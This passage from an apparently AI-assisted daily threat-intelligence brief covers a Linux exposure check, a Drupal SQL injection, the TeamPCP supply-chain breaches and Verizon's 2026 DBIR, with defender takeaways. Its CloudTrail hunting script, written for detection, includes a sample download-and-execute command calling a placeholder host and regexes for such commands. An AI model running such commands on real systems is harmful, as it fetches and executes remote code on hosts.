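    return {"1": "restricted", "2": "disabled"}.get(sysctl_value.strip(), "enabled")


def assess(proc_modules: str, modprobe_confs: list[str], sysctl_value: str | None) -> Exposure:
    return Exposure(rds_loaded(proc_modules), rds_blacklisted(modprobe_confs), io_uring_state(sysctl_value))


def read_optional(path: str) -> str | None:
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return None


def assess_live_system() -> Exposure:
    """Read the live host; both modprobe.d locations are consulted."""
    paths = sorted(glob.glob("/etc/modprobe.d/*.conf") + glob.glob("/usr/lib/modprobe.d/*.conf"))
    confs = [c for p in paths if (c := read_optional(p)) is not None]
    return assess(read_optional("/proc/modules") or "", confs,
                  read_optional("/proc/sys/kernel/io_uring_disabled"))


if __name__ == "__main__":
    ex = assess_live_system()
    print(f"rds loaded={ex.rds_loaded} blacklisted={ex.rds_blacklisted} io_uring={ex.io_uring}")
    if ex.exposed:
        print("EXPOSED: apply the upstream kernel fix; meanwhile blacklist rds and set kernel.io_uring_disabled=2")
    else:
        print("not exposed via these two primitives (kernel patch still required)")
```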

— *Source: [oss-security mailing list / V12 Security](https://www.openwall.com/lists/oss-security/2026/05/19/6) · Additional source: [BleepingComputer](https://www.bleepingcomputer.com/news/linux/exploit-released-for-new-pintheft-arch-linux-root-escalation-flaw/) · Tags: vulnerabilities, lpe, poc-public, patch-available · Region: global · Sector: technology*


## 4. Updates to Prior Coverage

### UPDATE: Drupal SA-CORE-2026-004 / CVE-2026-9082 ships — "highly critical" pre-auth SQL injection in core database API, PostgreSQL-only

> **UPDATE (originally covered 2026-05-20):** yesterday's brief carried Drupal's PSA pre-warning that a "highly critical" core advisory was scheduled for 2026-05-20; today the [SA-CORE-2026-004 advisory](https://www.drupal.org/sa-core-2026-004) landed with **CVE-2026-9082** assigned — an anonymous SQL-injection in Drupal core's database abstraction API (CWE-89) rated **20/25 on Drupal's risk scale (Highly Critical)** that affects only PostgreSQL-backed installations. Specially-crafted HTTP requests slip past sanitisation in the core DB-API layer and inject arbitrary SQL with no authentication; successful exploitation leads to information disclosure, privilege escalation and — in some database configurations — RCE. The Drupal Security Team explicitly stated that "exploits might be developed within hours or days" of advisory release ([Drupal PSA, 2026-05-18](https://www.drupal.org/psa-2026-05-18)).
>
> Affected versions: 8.9.0 through 10.4.10, 10.5.x < 10.5.10, 10.6.x < 10.6.9, 11.0.0 through 11.1.10, 11.2.x < 11.2.12, 11.3.x < 11.3.10. Patched: 10.4.10 / 10.5.10 / 10.6.9 / 11.1.10 / 11.2.12 / 11.3.10 (released 2026-05-20). MySQL / MariaDB / SQLite installations are not affected by this CVE. Drupal 7 is unaffected; sites on EOL Drupal 8/9 majors must apply manual patch files. [Drupal Steward WAF](https://www.drupal.org/steward) subscribers receive vendor-provided rules at advisory release per the service description; non-subscriber sites must apply the core update. NCSC-CH carried the advisory in its Security Hub ([NCSC-CH, 2026-05-19](https://security-hub.ncsc.admin.ch/#/posts/12584); [SecurityWeek, 2026-05-19](https://www.securityweek.com/drupal-to-patch-highly-critical-vulnerability-at-risk-of-quick-exploitation/); [CSO Online, 2026-05-20](https://www.csoonline.com/article/4175329/drupal-admins-rushing-to-patch-maximum-severity-sql-injection-vulnerability.html)).
>
> **Defender takeaway:** detection — PostgreSQL slow-query logs and `pg_stat_activity` for abnormal SQL statements from the Drupal application user; web-server access logs for unusual URL-encoded SQL meta-characters in POST/GET parameters proxied through the Drupal DB-API layer; WAF rules targeting PostgreSQL-specific injection patterns (`UNION`, `CAST`, `pg_sleep`). Hardening — patch immediately on PostgreSQL backends; if patch deployment is blocked by change-control, temporarily front the site with the Drupal Steward WAF or apply a temporary WAF rule covering known SQL-injection vectors at the DB-API layer.
>
> — *Source: [Drupal Security Team SA-CORE-2026-004](https://www.drupal.org/sa-core-2026-004) · Additional source: [NCSC-CH Security Hub](https://security-hub.ncsc.admin.ch/#/posts/12584) · Additional source: [SecurityWeek](https://www.securityweek.com/drupal-to-patch-highly-critical-vulnerability-at-risk-of-quick-exploitation/) · Additional source: [CSO Online](https://www.csoonline.com/article/4175329/drupal-admins-rushing-to-patch-maximum-severity-sql-injection-vulnerability.html) · Tags: vulnerabilities, pre-auth, patch-available, eu-nexus · Region: global, europe, switzerland · Sector: public-sector, education, media · CVE: CVE-2026-9082 · CVSS: 20/25 Drupal-scale (highly critical) · Vector: zero-click · Auth: pre-auth · Status: patch-available*

### UPDATE: TeamPCP / Mini Shai-Hulud campaign — GitHub itself breached (~3,800 internal repos via poisoned VS Code extension), Microsoft `durabletask` PyPI worm propagates via AWS SSM and `kubectl exec`, Grafana confirms missed-token-rotation root cause

> **UPDATE (originally covered 2026-05-13 deep dive; multiple subsequent updates):** three new TeamPCP / Mini Shai-Hulud developments landed in this window — GitHub itself, the official Microsoft `durabletask` PyPI package, and the Grafana Labs root-cause disclosure.
>
> **GitHub.** GitHub confirmed on 2026-05-20 that TeamPCP (also tracked as UNC6780) accessed approximately 3,800 internal GitHub repositories after a single GitHub employee installed a poisoned Visual Studio Code extension on their device ([The Hacker News, 2026-05-20](https://thehackernews.com/2026/05/github-investigating-teampcp-claimed.html); [The Record, 2026-05-20](https://therecord.media/github-confirms-teampcp-hack-customers-unaffected); [Infosecurity Magazine, 2026-05-20](https://www.infosecurity-magazine.com/news/github-confirms-breach-vs-code/); [Help Net Security, 2026-05-20](https://www.helpnetsecurity.com/2026/05/20/github-breached-teampcp/)). GitHub detected and contained the breach on 2026-05-19, isolated the affected endpoint and rotated high-impact secrets; the company states there is no evidence customer data stored outside the internal repositories was accessed. **GitHub has not publicly named the malicious VS Code extension or its publisher at this writing.** TeamPCP listed the stolen repositories — including GitHub Actions internals, agentic-workflow code, Copilot internal projects, CodeQL tools, Codespaces, Dependabot, and a Rails controller managing organisations and PRs — for sale at $50,000, with LAPSUS$ announcing a joint sale and a $95,000 asking price.
>
> **durabletask (PyPI).** Wiz Security reported on 2026-05-20 that the TeamPCP / Mini Shai-Hulud worm compromised the official Microsoft `durabletask` PyPI package via versions 1.4.1, 1.4.2 and 1.4.3 ([Wiz, 2026-05-20](https://www.wiz.io/blog/durabletask-teampcp-supply-chain-attack)). The payload is a dropper that fetches `rope.pyz` from `check.git-service[.]com`; per Wiz the second stage is a full credential stealer targeting AWS, Azure, GCP, Kubernetes and Vault credentials, 1Password and Bitwarden vaults, filesystem credentials and shell history. Propagation per Wiz: on Kubernetes hosts the worm uses `kubectl exec`; on AWS EC2 instances it propagates via AWS Systems Manager `SendCommand` against up to 5 targets per host (`T1078.004` Cloud Accounts, `T1570` Lateral Tool Transfer).
>
> **Grafana Labs.** Grafana Labs published the post-mortem of its own TeamPCP breach on 2026-05-19, confirming the root cause was a single GitHub Actions workflow token that slipped through the rotation process after the TanStack npm supply-chain attack ([Grafana Labs, 2026-05-19](https://grafana.com/blog/grafana-labs-security-update-latest-on-tanstack-npm-supply-chain-ransomware-incident/); [BleepingComputer, 2026-05-20](https://www.bleepingcomputer.com/news/security/grafana-breach-caused-by-missed-token-rotation-after-tanstack-attack/)). Per Grafana's own post-mortem the TanStack compromise was detected on 2026-05-11 (note: BleepingComputer cites 2026-05-01 for the malicious-package consumption event — surfaced as a contradiction in § 7); Grafana rotated the bulk of its GitHub workflow tokens, but the residual unrotated token gave TeamPCP access to clone private source-code repositories (exact count not disclosed in Grafana's post-mortem). Grafana refused the extortion demand on 2026-05-16. The exfiltration scope is confirmed limited to Grafana Labs GitHub repositories (public source code, private source code and internal repos); customer production data was not affected.
>
> **Defender takeaway:** audit VS Code extension policy on developer endpoints and enforce a managed allowlist (VS Code's `extensions.allowed` setting, pushed via Group Policy / MDM). The Marketplace signature that VS Code verifies at install time only attests that the package is the one the Marketplace served; it says nothing about the publisher or the extension's behaviour, so signing is not a substitute for an allowlist. Hunt: Sysmon EID 1 for `code --install-extension` invocations catches CLI installs only, so also reconcile each endpoint's `~/.vscode/extensions/extensions.json` (Windows: `%USERPROFILE%\.vscode\extensions\extensions.json`) against the allowlist; look for process trees where `Code.exe` or `code-server` spawns credential-access tooling (`git-credential-manager`, `aws configure`, keychain access). After any supply-chain incident, audit rotation completeness for every long-lived credential reachable from CI (workflow secrets, PATs, deploy keys); short-lived OIDC-federated tokens need no rotation, which is the argument for moving CI to them. Verify GitHub secret scanning and push protection are enabled on every org. Search dependency manifests, lockfiles and CI install logs for `durabletask` pinned or resolved to 1.4.1, 1.4.2 or 1.4.3, and treat any host that installed one of those versions as fully compromised. Review CloudTrail for SSM `SendCommand` invocations that do not correspond to authorised maintenance windows, in particular calls whose caller identity is an EC2 instance role rather than an operator, which is what host-to-host worm propagation looks like in the trail.
>
> — *Source: [The Hacker News](https://thehackernews.com/2026/05/github-investigating-teampcp-claimed.html) · Additional source: [Wiz Security](https://www.wiz.io/blog/durabletask-teampcp-supply-chain-attack) · Additional source: [Grafana Labs](https://grafana.com/blog/grafana-labs-security-update-latest-on-tanstack-npm-supply-chain-ransomware-incident/) · Additional source: [The Record](https://therecord.media/github-confirms-teampcp-hack-customers-unaffected) · Additional source: [BleepingComputer](https://www.bleepingcomputer.com/news/security/grafana-breach-caused-by-missed-token-rotation-after-tanstack-attack/) · Additional source: [Help Net Security](https://www.helpnetsecurity.com/2026/05/20/github-breached-teampcp/) · Tags: supply-chain, organized-crime, cloud, identity, data-breach · Region: global · Sector: technology, public-sector*
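The CloudTrail hunt suggested in the defender takeaway, written out as an added example (not code from Wiz, GitHub or this brief). It scores every `SendCommand` management event on four signals: the call falls outside a planned maintenance window, the caller is an EC2 instance-role session (session name is an instance ID), the call fans out to several instances at once, and the command body contains a download-and-execute fragment. The maintenance windows, account ID, role names, instance IDs and the three event records are constructed; the `FANOUT_THRESHOLD` is an arbitrary starting point. It assumes the trail records the `parameters` field for `SendCommand`; if your trail redacts it, the command-body check never fires and the other three signals still apply.

```python
"""Hunt CloudTrail SendCommand events that look like worm propagation, not administration."""
import json
import re
from datetime import datetime, timezone

# Planned change windows (UTC); any SendCommand outside them is unplanned. Constructed.
MAINTENANCE_WINDOWS = [
    (datetime(2026, 5, 19, 2, 0, tzinfo=timezone.utc),
     datetime(2026, 5, 19, 4, 0, tzinfo=timezone.utc)),
]
FANOUT_THRESHOLD = 3  # one call addressing this many instances counts as fan-out

# Download-and-execute fragments that do not belong in a RunShellScript body.
SUSPICIOUS_CMD = re.compile(
    r"(?:curl|wget)[^|;&\n]*\|\s*(?:ba)?sh\b|base64\s+(?:-d|--decode)|python3?\s+-c", re.I)
# Instance-profile credentials appear as AssumedRole sessions whose session name is
# the instance ID: arn:aws:sts::<acct>:assumed-role/<role>/i-0abc...
INSTANCE_SESSION = re.compile(r"/i-[0-9a-f]{8,17}$")

SAMPLE_EVENTS = [  # constructed CloudTrail records, not real telemetry
    {   # operator-driven patching inside the window: must not be flagged
        "eventTime": "2026-05-19T02:30:00Z", "eventSource": "ssm.amazonaws.com",
        "eventName": "SendCommand", "sourceIPAddress": "203.0.113.10",
        "userIdentity": {"type": "AssumedRole",
                         "arn": "arn:aws:sts::111122223333:assumed-role/OpsAdmin/alice"},
        "requestParameters": {"documentName": "AWS-RunPatchBaseline",
                              "instanceIds": ["i-0aaa111122223333a"],
                              "parameters": {"Operation": ["Install"]}},
    },
    {   # worm-shaped: an instance-role session fans a download-and-execute out to five peers
        "eventTime": "2026-05-19T11:42:07Z", "eventSource": "ssm.amazonaws.com",
        "eventName": "SendCommand", "sourceIPAddress": "10.0.3.17",
        "userIdentity": {"type": "AssumedRole",
                         "arn": "arn:aws:sts::111122223333:assumed-role/WebAppRole/i-0bbb444455556666b"},
        "requestParameters": {"documentName": "AWS-RunShellScript",
                              "instanceIds": [f"i-0c0000000000000c{n}" for n in range(1, 6)],
                              "parameters": {"commands": ["curl -fsSL http://stage2.example.invalid/s.sh | bash"]}},
    },
    {   # human operator, one host, benign command, but unplanned: flagged on the window only
        "eventTime": "2026-05-20T09:00:00Z", "eventSource": "ssm.amazonaws.com",
        "eventName": "SendCommand", "sourceIPAddress": "203.0.113.10",
        "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/bob"},
        "requestParameters": {"documentName": "AWS-RunShellScript",
                              "instanceIds": ["i-0aaa111122223333a"],
                              "parameters": {"commands": ["systemctl restart nginx"]}},
    },
]


def _ts(value):
    """CloudTrail eventTime is ISO 8601 with a trailing Z."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def in_maintenance_window(ts):
    return any(start <= ts <= end for start, end in MAINTENANCE_WINDOWS)


def caller_is_instance_role(user_identity):
    return (user_identity.get("type") == "AssumedRole"
            and bool(INSTANCE_SESSION.search(user_identity.get("arn", ""))))


def assess(event):
    """Return a finding dict for a suspicious SendCommand, or None."""
    if event.get("eventSource") != "ssm.amazonaws.com" or event.get("eventName") != "SendCommand":
        return None
    params = event.get("requestParameters") or {}
    targets = list(params.get("instanceIds") or [])
    for target in params.get("targets") or []:  # explicit instance lists via Targets=
        if target.get("key") == "InstanceIds":
            targets.extend(target.get("values") or [])
    commands = " ".join((params.get("parameters") or {}).get("commands") or [])
    reasons = []
    if not in_maintenance_window(_ts(event["eventTime"])):
        reasons.append("outside maintenance window")
    if caller_is_instance_role(event.get("userIdentity") or {}):
        reasons.append("issued with EC2 instance-role credentials")
    if len(targets) >= FANOUT_THRESHOLD:
        reasons.append(f"fan-out to {len(targets)} targets")
    if SUSPICIOUS_CMD.search(commands):
        reasons.append("download-and-execute pattern in command body")
    if not reasons:
        return None
    return {"eventTime": event["eventTime"], "caller": (event.get("userIdentity") or {}).get("arn"),
            "source": event.get("sourceIPAddress"), "document": params.get("documentName"),
            "targets": targets, "reasons": reasons}


def hunt(events):
    """Run assess() over a list of CloudTrail records (e.g. the 'Records' array of a trail file)."""
    return [finding for finding in (assess(e) for e in events) if finding]


if __name__ == "__main__":
    print(json.dumps(hunt(SAMPLE_EVENTS), indent=2))
```

Feed it the `Records` array of CloudTrail log files, or the rows of an Athena/CloudTrail Lake query on `eventName = 'SendCommand'`; a record with the instance-role signal plus fan-out or the command-body signal is worth an immediate isolate-and-rotate, while the window-only signal is triage noise to reconcile against the change calendar.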

## 5. Deep Dive — Verizon 2026 DBIR: vulnerability exploitation overtakes credentials as primary breach vector for the first time in 19 years

Verizon published the 2026 Data Breach Investigations Report on 2026-05-19 covering, per the full DBIR PDF, tens of thousands of security incidents and over ten thousand confirmed breaches collected over the standard DBIR window (autumn of the prior year through autumn of the report year) ([Verizon official press release via GlobeNewswire, 2026-05-19](https://www.globenewswire.com/news-release/2026/05/19/3297614/0/en/Vulnerability-Exploitation-Top-Breach-Entry-Point-2026-Industry-Wide-DBIR-Finds.html); [Help Net Security analysis, 2026-05-20](https://www.helpnetsecurity.com/2026/05/20/verizon-2026-dbir-findings/); [Verizon DBIR landing page](https://www.verizon.com/business/resources/reports/dbir/) — the specific dataset incident / breach counts cited by some secondary coverage were not separately confirmed in the press-release coverage and should be read against the full DBIR PDF at `verizon.com/business/resources/T1f0/reports/2026-dbir-data-breach-investigations-report.pdf`). This is the publication event that the 2026-W21 weekly summary flagged as imminent — the dedicated PD-9 treatment lands here. The report is structurally significant for European public-sector SOCs because it provides industry-spanning patching-cadence and supply-chain benchmarks that map cleanly onto NIS2 risk-management obligations.

**Headline shift: exploitation overtakes credentials.** For the first time in the DBIR's 19-year history, vulnerability exploitation (`T1190` Exploit Public-Facing Application) is the leading initial-access vector at 31 % of breaches — Verizon's own press-release language ([GlobeNewswire](https://www.globenewswire.com/news-release/2026/05/19/3297614/0/en/Vulnerability-Exploitation-Top-Breach-Entry-Point-2026-Industry-Wide-DBIR-Finds.html)). Per Help Net Security's reading of the full DBIR, compromised credentials (`T1078` Valid Accounts; `T1110` Brute Force) dropped to 13 % ([Help Net Security, 2026-05-20](https://www.helpnetsecurity.com/2026/05/20/verizon-2026-dbir-findings/)). This is a sustained inversion, not a single-year blip — the trend curve has been climbing for three reporting cycles and accelerated sharply in the 2024-2025 window. For SOCs, the implication is that a detection-investment plan that still ranks credential-stuffing telemetry above EDR exploit-protection coverage and network-layer anomaly detection for exploitation activity is now out of alignment with the breach distribution.

**Patching-cadence regression.** Only **26 % of CVEs listed in the CISA Known Exploited Vulnerabilities (KEV) catalog were fully remediated** by polled organisations in the reporting window, down from 38 % the prior year. The median time to patch deteriorated from 32 days to 43 days. Per PD-13 the KEV remediation deadline itself has no jurisdictional weight in CH/EU, but the *listing flag* is jurisdiction-agnostic intelligence about exploitation in the wild — and the DBIR's finding is that organisations across the dataset miss KEV remediation roughly three quarters of the time, whether or not a BOD 22-01 deadline applies to them. The benchmark for CH/EU public-sector defenders is therefore an honest one: most peers are not patching their KEV inventory on time, and a median 43-day exposure is the operational reality. A SOC that is hitting 14-day patch SLAs on KEV entries is now outperforming the industry median by roughly a factor of three.

**Supply-chain breaches as the dominant compounding factor.** Third-party / supply-chain breaches grew 60 % year-over-year and now represent **48 % of all breaches** in the dataset (`T1195` Supply Chain Compromise). Only 23 % of affected organisations had fully remediated MFA gaps in third-party cloud accounts — the most common upstream pivot point. The 60 % growth aligns with the campaign-level signal this brief has carried throughout May 2026 (TeamPCP / Mini Shai-Hulud — see § 4 UPDATE; Nx Console / actions-cool-issues-helper / TanStack / durabletask). The actionable layer for defenders is third-party-CI access scoping — every reduction in the cross-tenant blast radius of a single compromised dev-tool integration directly reduces measured breach probability.

**Ransomware and AI signals.** Ransomware was present in **48 % of breaches**, up from 44 %; the share of victims that did not pay held at 69 %. The DBIR carries shadow AI usage as the third-most-common insider data-loss mechanism, with usage rates quadrupling year-over-year; the report also notes AI-bot traffic growing 21 % month-over-month against 0.3 % growth for human traffic. Verizon's press-release framing is that "AI is being leveraged by threat actors to accelerate the time to exploit known vulnerabilities, shrinking the window for defense from months to mere hours" ([GlobeNewswire](https://www.globenewswire.com/news-release/2026/05/19/3297614/0/en/Vulnerability-Exploitation-Top-Breach-Entry-Point-2026-Industry-Wide-DBIR-Finds.html)). That finding maps directly onto the patch-velocity number: a 43-day median patch time that was tolerable when working PoCs took weeks is insufficient when AI-assisted exploitation collapses weaponisation latency to hours.

**Defender takeaways for a Swiss / European public-sector SOC:**
- Re-weight detection-investment priorities: EDR exploit-protection coverage and network-layer anomaly detection for `T1190` exploitation activity now rank above credential-stuffing detection for breach-probability reduction.
- Use the 26 % KEV remediation rate and 43-day median patch time as the public benchmark when justifying patch-cadence SLAs to programme owners; the industry's distribution is far worse than most ISMS targets assume.
- Treat third-party cloud-tenancy MFA gap closure as the single highest-leverage control — the 23 % remediation rate is the most actionable bar to clear.
- Map the +60 % supply-chain finding directly onto NIS2 Article 21(2)(d) supply-chain-security obligations during the next ISMS review cycle; the DBIR is now the canonical industry-baseline citation.

— *Source: [Verizon official press release (GlobeNewswire)](https://www.globenewswire.com/news-release/2026/05/19/3297614/0/en/Vulnerability-Exploitation-Top-Breach-Entry-Point-2026-Industry-Wide-DBIR-Finds.html) · Additional source: [Help Net Security analysis](https://www.helpnetsecurity.com/2026/05/20/verizon-2026-dbir-findings/) · Additional source: [Verizon DBIR landing page](https://www.verizon.com/business/resources/reports/dbir/) · Tags: vulnerabilities, ransomware, supply-chain, ai-abuse, identity · Region: global · Sector: public-sector, finance, healthcare, technology*

## 6. Action Items

- **Patch Drupal core on PostgreSQL backends immediately** — upgrade to 10.4.10 / 10.5.10 / 10.6.9 / 11.1.10 / 11.2.12 / 11.3.10. The Drupal Security Team warned that exploits "might be developed within hours or days" of the SA-CORE-2026-004 advisory (see § 4 UPDATE). If patch deployment is gated by change-control, temporarily front the site with Drupal Steward or an equivalent WAF SQL-injection rule, and treat that as a stopgap only: a WAF inspects HTTP request parameters and cannot see the database-API layer where the flaw sits, so any request path that reaches that layer remains a potential vector until the core update lands. — *Source: [Drupal SA-CORE-2026-004](https://www.drupal.org/sa-core-2026-004) · Tags: vulnerabilities, pre-auth, patch-available · Region: global, europe · Sector: public-sector, education*
- **Upgrade Keycloak to 26.6.2** with priority on identity-federation deployments (national digital-identity platforms, eHealth federations). The OIDC session-fixation (CVE-2026-7507), WebAuthn execute-actions replay (CVE-2026-37982) and cross-realm IDOR in Authorization Services (CVE-2026-4630) are the operationally-most-dangerous CVEs in the batch (see § 2). For Red Hat build of Keycloak, apply the corresponding RHSA advisories on the 26.2.x branch. — *Source: [Keycloak 26.6.2 release notes](https://www.keycloak.org/2026/05/keycloak-2662-released) · Tags: vulnerabilities, identity, patch-available · Region: europe, dach · Sector: public-sector, healthcare*
- **Upgrade Azure Local Disconnected Operations (ALDO) to v2604+** on every air-gapped / data-sovereignty Azure Local deployment. The CVE-2026-42822 unauth EoP is rated CVSS 10.0 and "Exploitation More Likely" — cloud-managed Azure is already protected, manual stacks are not (see § 2). Restrict the ALDO management plane to admin-only OOB subnets until the upgrade is complete. — *Source: [Microsoft MSRC CVE-2026-42822](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-42822) · Tags: vulnerabilities, cloud, auth-bypass, patch-available · Region: global · Sector: public-sector, defense*
- **Complete the six-step SonicWall LDAP reconfiguration on every Gen6 SSL-VPN appliance** per SonicWall KB `kA1VN0000000RBd0AM` — firmware-update status alone is insufficient and Akira-linked actors are actively exploiting the UPN/SAM split (see § 1). Given Gen6 EoL on 2026-04-16, schedule migration to Gen7/Gen8. — *Source: [Cybersecurity Dive](https://www.cybersecuritydive.com/news/patch-bypass-hackers-exploit-flaw-sonicwall/820600/) · Tags: vulnerabilities, identity, actively-exploited, mitigation-only · Region: europe, global · Sector: public-sector, finance*
- **Disable the ChromaDB Python FastAPI server or block external access** — CVE-2026-45829 has a public PoC, v1.5.9 is unpatched, and the Python server is the affected component (the Rust server is not). Migrate to the Rust server (`chroma run`) or front the API with network-layer access controls; ensure no ChromaDB deployment is internet-exposed (see § 2). — *Source: [Hadrian Security](https://hadrian.io/blog/cve-2026-45829----chromadb-python-server-hands-you-rce-before-it-asks-who-you-are) · Tags: vulnerabilities, rce, pre-auth, no-patch, ai-abuse · Region: global · Sector: technology, education*
- **Hunt for Webworm Discord and Microsoft Graph API C2** — alert on outbound HTTPS to `discord.com/api/*` or `graph.microsoft.com` from process trees whose parent is not the expected first-party application; correlate Graph API non-interactive sign-ins for app registrations without enterprise approval, and flag `cmd.exe` spawned by long-running services with no interactive user context (see § 1). Apply Conditional Access on Microsoft Graph restricting non-managed device sign-ins on workstations that have no Graph integration need. — *Source: [ESET WeLiveSecurity](https://www.welivesecurity.com/en/eset-research/webworm-new-burrowing-techniques/) · Tags: nation-state, espionage, identity, china-nexus · Region: europe · Sector: public-sector*
- **Audit VS Code extension installation policies on every developer endpoint** — enforce a managed allowlist via Group Policy / MDM (VS Code's `extensions.allowed` setting), set `extensions.autoUpdate: false`, and rotate every secret accessible to extensions whenever a supply-chain compromise is confirmed (see § 4 UPDATE TeamPCP / GitHub breach). Hunt Sysmon EID 1 for `code --install-extension` invocations on dev endpoints and reconcile each endpoint's `extensions.json` inventory against the allowlist, since UI installs leave no command line to catch; search dependency manifests, lockfiles and CI install logs for `durabletask` resolved to 1.4.1, 1.4.2 or 1.4.3 and treat any host that installed a malicious version as fully compromised. — *Source: [Help Net Security](https://www.helpnetsecurity.com/2026/05/20/github-breached-teampcp/) · Tags: supply-chain, organized-crime · Region: global · Sector: technology, public-sector*

## 7. Verification Notes

- **Out-of-window drops (primary source older than 36h window):** **Exim CVE-2026-45185 "Dead.Letter"** — XBOW disclosure 2026-05-12, NCSC-NL advisory 2026-05-15; S2 surfaced an exploitation-confirmation quote from NCSC-NL but its publication date is ambiguous, so the item is held to the next run with the underlying advisory carried forward; **Fortinet CVE-2026-44277 (FortiAuthenticator) / CVE-2026-26083 (FortiSandbox)** — Fortinet PSIRT FG-IR-26-128 dated 2026-05-12, NCSC-CH advisory 2026-05-13, both outside the 36 h window; **SAP May 2026 Security Patch Day (CVE-2026-34260, CVE-2026-34263)** — SAP Security Notes dated 2026-05-12, outside window; **CrowdStrike 2026 Financial Services Threat Landscape Report** — both cited URLs carry publication date 2026-05-14 (not 2026-05-20 as the sub-agent return initially asserted), which puts the report 6 days outside the 36 h window. Item dropped from § 3 by iteration-1 verification (consistent with the SAP / Fortinet treatment in this same list); finance-sector audience may pick up the synthesis directly from the [CrowdStrike press release](https://www.crowdstrike.com/en-us/press-releases/crowdstrike-2026-financial-services-threat-landscape-report/) or [CrowdStrike blog](https://www.crowdstrike.com/en-us/blog/crowdstrike-2026-financial-services-threat-landscape-report/).
- **Already-covered drops:** **Microsoft Fox Tempest malware-signing-as-a-service disruption** — covered in 2026-05-20 active-threats; S3 re-surfaced the Microsoft Threat Intelligence and Microsoft On the Issues posts with no material new development beyond yesterday's coverage. **Huawei VRP zero-day → Luxembourg POST 2025 nationwide outage** — covered in 2026-05-20 active-threats with the same The Record + Security Affairs sources S4 re-surfaced; no new technical specificity or CVE assignment in this run.
- **Long-running-campaign rule application:** **Microsoft Exchange CVE-2026-42897** — re-surfaced by S2 with the same Microsoft MSRC + Microsoft Exchange Team + NCSC-CH + Help Net Security sources cited in the 2026-05-16 deep dive and the 2026-05-18 UPDATE. No new exploitation attribution, no new patch, no new victim class — per the long-running-campaign rule (≤1 consolidated UPDATE per week unless something critical changes) the item is not re-issued. Per PD-13 the imminent CISA KEV remediation deadline (2026-05-29, US-FCEB-only) is not a valid driver for a § 4 UPDATE.
- **Reduced-confidence / framing:** **B1ack's Stash 4.6M card dump** included as a dark-web claim with explicit "not confirmed by issuing institutions" framing; SOCRadar and Security Affairs both analyse the actual dump, but per-issuer attribution is unverified. **Huawei VRP / Luxembourg** (not in this brief, but referenced in the dropped-list) — confidence remains MEDIUM in the sub-agent finding due to absence of any Huawei PSIRT advisory after ~10 months, no CVE assigned and no technical advisory specificity.
- **Contradiction:** Grafana TanStack timeline — Grafana's own post-mortem ([Grafana Labs, 2026-05-19](https://grafana.com/blog/grafana-labs-security-update-latest-on-tanstack-npm-supply-chain-ransomware-incident/)) cites detection of the TanStack compromise on **2026-05-11**; BleepingComputer's reporting ([BleepingComputer, 2026-05-20](https://www.bleepingcomputer.com/news/security/grafana-breach-caused-by-missed-token-rotation-after-tanstack-attack/)) cites **2026-05-01** for the malicious-package consumption event. The brief reports Grafana's date on the basis that Grafana is the primary disclosing party for its own incident; the 10-day discrepancy may reflect the difference between the malicious-package's pull-time on the CI/CD runner and the detection event on Grafana's security team's timeline.
- **Single-source items:** none in this brief — every published item carries ≥2 independent reputable sources or qualifies under the PD-5 national-CERT carve-out with the CERT acting as primary disclosing party.
- **CVEs that did not clear § 2 inclusion gates** (PD-2 § 2 gates: CISA KEV, ENISA EUVD `exploited=true` or CVSS≥9.0, vendor/researcher report of ITW exploitation, or pre-auth RCE on widely-deployed internet-exposed software with public PoC): none dropped from in-window candidates in this run; out-of-window CVEs listed above were not evaluated against gates.
- **Sub-agent self-identification:** all four `cti-research` sub-agents (S1, S2, S3, S4) returned with `**Model:**` and `**Timestamps:**` lines; the AI-content notice and `Generated by:` line collapse to the single distinct model Claude Sonnet 4.6 since all four research roles reported that model.
- **Verification disposition (Phase 5.7):** five iterations ran with model rotation per v2.47 (iter-1 Opus, iter-2 Sonnet alt, iter-3 Opus cold, iter-4 Sonnet alt, iter-5 Opus cold); cumulative findings across iterations remediated in-line. Iter-5 returned NEEDS_FIXES with truth=1 (the unsupported "approximately 20 % the previous year" prior-year DBIR baseline in § 5 Headline shift paragraph) and one advisory (Grafana scope wording precision drift) — both remediated post-verdict before commit. The brief publishes at the v2.46 5-cap safety valve with `verification_residual_count=1` recording the final-iteration verdict as the cap-breach signal for the Ops dashboard. The notable verification finding-cluster of this run was iter-3's surfacing of multiple sub-agent attribution-discipline regressions in the § 4 TeamPCP UPDATE (five FIRESCALE / 417k / SSM specifics misattributed to Wiz), all remediated by aligning the body to Wiz's actual published technical detail.
- **Coverage gaps:** databreaches-net (Cloudflare 403, Wayback empty — now 5 consecutive run failures); inside-it-ch (403 persistent — 4-run failure); sophos-xops (HTTP 503 persistent — 4-run failure); trendmicro-research (HTTP 500 persistent, no Wayback snapshot); cyberscoop (TLS certificate not-yet-valid error); darkreading (HTTP 403, no Wayback); cert-fr-actu (feed stale since October 2025); us-treasury-ofac (503); cert-eu (200 empty-body — 2-run failure); edpb, cnil-fr, ico-uk, agid-csirt-it — quiet in window (no in-window enforcement items); ncsc-ch-security-hub bridge subcommand and chrome-releases and jpcert not fetched in this run.
